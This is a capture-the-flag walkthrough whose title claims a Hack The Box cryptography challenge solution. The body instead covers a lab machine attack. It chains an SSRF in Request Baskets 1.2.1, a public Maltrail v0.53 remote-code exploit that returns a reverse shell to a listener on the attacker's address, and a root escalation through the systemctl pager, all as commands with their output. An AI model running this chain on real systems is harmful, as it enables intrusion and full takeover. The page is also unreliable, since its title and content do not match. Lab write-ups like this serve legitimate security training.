HTB Brevi Moduli Solution (Without SageMath)
HTB Cryptography Challenge
# Step 1 - Find active ports
sudo nmap -p- -Pn --min-rate 10000 10.129.138.176
# Step 2 - Focus scan on the active ports found
sudo nmap -A -T4 -Pn -p22,80,8338,55555 10.129.138.176
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 01:58 EST
Nmap scan report for 10.129.138.176
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Thu, 14 Nov 2024 06:59:01 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Thu, 14 Nov 2024 06:59:01 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94SVN%I=7%D=11/14%Time=67359FB4%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/ht
SF:ml;\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Thu,\x2014\x20Nov
SF:\x202024\x2006:59:01\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=
SF:\"/web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio
SF:n:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\
SF:x20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Thu,\x2014\x20Nov
SF:\x202024\x2006:59:01\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReq
SF:uest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pl
SF:ain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Requ
SF:est")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x2
SF:0text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad
SF:\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\
SF:r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\
SF:r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")
SF:%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 55555/tcp)
HOP RTT ADDRESS
1 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.79 seconds
The ports 80 and 8338 seem to be filtered, but we can see that port 55555 is open.
Lets enumerate port 55555 visiting it through the web browser:
http://10.129.138.176:55555
When visiting the website we get redirected to:
http://10.129.138.176:55555/web
We will do what we almost always do first, look at the bottom of the website:
Powered by request-baskets | Version: 1.2.1
Now we know that the page is running Request Baskets version 1.2.1
Searching on google we found that the version 1.2.1 of Request Baskets is vulnerable to CVE-2023-27163.
We can abuse this to enumerate the filtered port 80 from the target machine.
To do that, we can follow these steps:
# Click on Create, the value there doesnt matter
http://10.129.138.176:55555/web
# Then click on
Open Basket
# Go to
Settings (Click on Gear icon at the top)
# Enter the following
Forward URL:
http://127.0.0.1:80
Activate check -> Proxy Response
Activate check -> Expand Forward Path
# Then click on
Apply
# Now visit the URL unter "Empty basket!"
http://10.129.138.176:55555/2ungbj8
# The page which is running locally at port 80 of the target, which we couldnt access externally, will open
If we scroll down on the exposed website, we will find the following:
Powered by Maltrail (v0.53)
If we google Maltrail 0.53 exploit, we will find the following RCE exploit:
https://github.com/spookier/Maltrail-v0.53-Exploit
Now lets use it and get access:
# Get the exploit
git clone https://github.com/spookier/Maltrail-v0.53-Exploit.git
cd Maltrail-v0.53-Exploit
# Start nc listener
nc -lvnp 8443
# Run the exploit (Notice that I entered as target URL the URL through which we accessed port 80)
python3 exploit.py 10.10.14.206 8443 http://10.129.138.176:55555/2ungbj8
Nice! We got access as puma:
listening on [any] 8443 ...
connect to [10.10.14.206] from (UNKNOWN) [10.129.138.176] 51028
$ whoami
whoami
puma
Update shell with:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Now we can get the user.txt flag:
cat /home/puma/user.txt
Lets use sudo -l and see what we can get:
puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
Checking the systemctl version we found out that the version is vulnerable to CVE-2023-26604:
systemctl --version
systemd 245 (245.4-4ubuntu3.22)
+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN2 -IDN +PCRE2 default-hierarchy=hybrid
Write “systemd 245 (245.4-4ubuntu3.22) cve” on google:
https://access.redhat.com/security/cve/cve-2023-26604
https://www.suse.com/security/cve/CVE-2023-26604.html
We can exploit it running it as sudo and then entering !/bin/bash after RETURN message:
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
- (press RETURN)!/bin/bash
!//bbiinn//bbaasshh!/bin/bash
root@sau:/opt/maltrail# whoami
whoami
root
Now we can get the root.txt flag:
cat /root/root.txt